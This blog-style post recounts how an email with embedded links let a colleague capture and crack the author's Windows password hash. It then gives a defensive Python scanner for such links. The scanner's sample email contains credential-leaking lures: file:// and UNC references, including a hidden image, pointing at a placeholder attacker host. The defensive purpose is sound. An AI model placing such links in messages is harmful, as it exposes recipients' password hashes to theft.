A few months ago, I participated in a public debate on password policy with my co-worker and friend, Kevin Mitnick. It was a heated back-and-forth discussion, with Kevin arguing for far longer passwords than most expert sources, including me, recommend. I just wasn’t buying his arguments.
Then he sent me an email that, when I opened it, sent Kevin my Microsoft Windows password hash, which he then cracked. It was a knock-out punch. I didn’t know it was possible.
I was a bit embarrassed, not only that I didn’t know it could be done, but that it had been widely known for years. That means red cheeks for any computer security professional, but since I fashion myself as a Windows authentication specialist, it was doubly embarrassing. Since then, I’ve learned that most computer security professionals don’t know that it can be done.
Cracking the password hash this way is possible because, under easy-to-simulate circumstances, embedded links in an email can cause your computer to try to authenticate to a remote server. That remote server can then capture your computer’s authentication attempt and use the captured information to recover your password hash and begin cracking it.
Said more clearly, I can send you an email and capture your password hash, and then crack it to your plaintext password.
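One defensive way to act on the mechanism described above is to scan inbound mail for the kinds of embedded links that make a Windows client reach out to a remote host and authenticate. The script below is an added example, not code from the original post or its author. It assumes (as is widely documented for Windows clients) that `file:` URLs and UNC paths (`\\host\share\...`) in an HTML or plain-text body are the references a mail client may resolve over SMB or WebDAV, sending an NTLM authentication attempt to that host; the sample message and every hostname in it are constructed placeholders.

```python
r"""Scan an email for links that could make a Windows client authenticate remotely.

Added example (not from the original post). Assumption: references with a
file: scheme or a UNC path (\\host\share\...) are the ones a Windows mail
client may resolve over SMB/WebDAV, sending an NTLM authentication attempt
to "host". All hostnames below are constructed .invalid placeholders.
"""
import email
import re
from email import policy
from html.parser import HTMLParser

# Constructed sample message for the demo; hostnames are placeholders.
SAMPLE_EML = r"""From: sender@example.invalid
To: you@example.invalid
Subject: Quarterly report
MIME-Version: 1.0
Content-Type: text/html; charset=utf-8

<html><body>
<p>Report: <a href="https://intranet.example.invalid/report">web copy</a></p>
<p>Alt copy: <a href="file://attacker-host.example.invalid/share/report.docx">here</a></p>
<p>Or open \\attacker-host.example.invalid\share\report.docx directly.</p>
<img src="\\attacker-host.example.invalid\share\logo.png" width="1" height="1">
</body></html>
"""

# A UNC path: two backslashes followed by a run of non-space, non-quote characters.
UNC_RE = re.compile(r'\\\\[^\s<>"\']+')
# A file: URL appearing in plain text.
FILE_URL_RE = re.compile(r'file:[^\s<>"\']+', re.I)


class _RefCollector(HTMLParser):
    """Collect href/src attribute values and the visible text of an HTML body."""

    def __init__(self):
        super().__init__()
        self.refs = []
        self.text = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("href", "src") and value:
                self.refs.append(value)

    def handle_data(self, data):
        self.text.append(data)


def is_auth_trigger(ref):
    """True if resolving `ref` could make Windows send NTLM credentials to a
    remote host (assumption: file: URLs and UNC paths)."""
    r = ref.strip()
    return r.lower().startswith("file:") or r.startswith("\\\\")


def find_auth_triggering_links(raw_eml):
    """Return the unique risky references found in an RFC 822 message string."""
    msg = email.message_from_string(raw_eml, policy=policy.default)
    found = []
    for part in msg.walk():
        ctype = part.get_content_type()
        if ctype not in ("text/html", "text/plain"):
            continue
        body = part.get_content()
        candidates = []
        if ctype == "text/html":
            collector = _RefCollector()
            collector.feed(body)
            candidates.extend(collector.refs)
            # UNC paths written as bare text are resolved by some clients too.
            candidates.extend(UNC_RE.findall(" ".join(collector.text)))
        else:
            candidates.extend(UNC_RE.findall(body))
            candidates.extend(FILE_URL_RE.findall(body))
        for ref in candidates:
            if is_auth_trigger(ref) and ref not in found:
                found.append(ref)
    return found


if __name__ == "__main__":
    for ref in find_auth_triggering_links(SAMPLE_EML):
        print("flag:", ref)
```

Run it on a saved `.eml` by reading the file into a string and passing it to `find_auth_triggering_links`. Flagged references are a signal to quarantine or rewrite the message before a client renders it; the same classification is useful in an egress control (blocking outbound SMB and enforcing that NTLM is only sent to trusted hosts) since the scan cannot see every path a client might take.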